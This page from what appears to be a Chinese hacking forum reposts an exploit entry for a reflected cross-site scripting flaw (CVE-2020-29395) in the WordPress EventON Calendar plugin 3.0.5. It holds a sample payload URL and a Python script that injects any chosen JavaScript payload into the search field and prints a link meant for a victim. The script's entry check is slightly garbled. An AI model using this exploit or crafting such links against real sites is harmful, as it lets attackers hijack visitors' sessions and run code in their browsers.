Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月3日3年前

# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Date: 27.11.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.myeventon.com/
# Version: 3.0.5
# Tested on: Ubuntu 18.04
# CVE : 2020-29395
# Description Link:
https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS

"""
                 ~ VULNERABLITY DETAILS ~
    
    https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
    
    #
    WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected 
    into the search field.
    
    #
    The following python code will inject javascript code and print out url that will be sent to victim. 
    If you use unicode caracters for xss , exploit will print page source.

    ##USAGE##
    
    $ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'

    ##OUTPUT##

    [+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>


"""
import requests
import sys
import argparse
from colorama import Fore
        
def vuln_reflected(url, payload):

    s = requests.Session()
    get_request = s.get(url+payload)
    
    if get_request.status_code == 500:
        print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")

    else:
        content_result = str(get_request.content)
        search_find = content_result.find(payload)

        if search_find != -1:
            print(Fore.GREEN+"[+] "+str(url)+str(payload))

        else:

            print(content_result)


def main():

    desc = "Wordpress EventON Calendar Plugin XSS"
    parser = argparse.ArgumentParser(description=desc)
    exp_option = parser.add_argument_group('')
    parser.add_argument("--exploit", help ="", action='store_true')
    parser.add_argument("--url",help="", type=str, required=False)
    parser.add_argument("--payload",help="",type=str,required=False)

    args = parser.parse_args()

    if args.exploit:

        if args.url:

            if args.payload:
                url = args.url
                payload = args.payload
                vuln_reflected(url, payload)

if name == 'main':
    main()

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索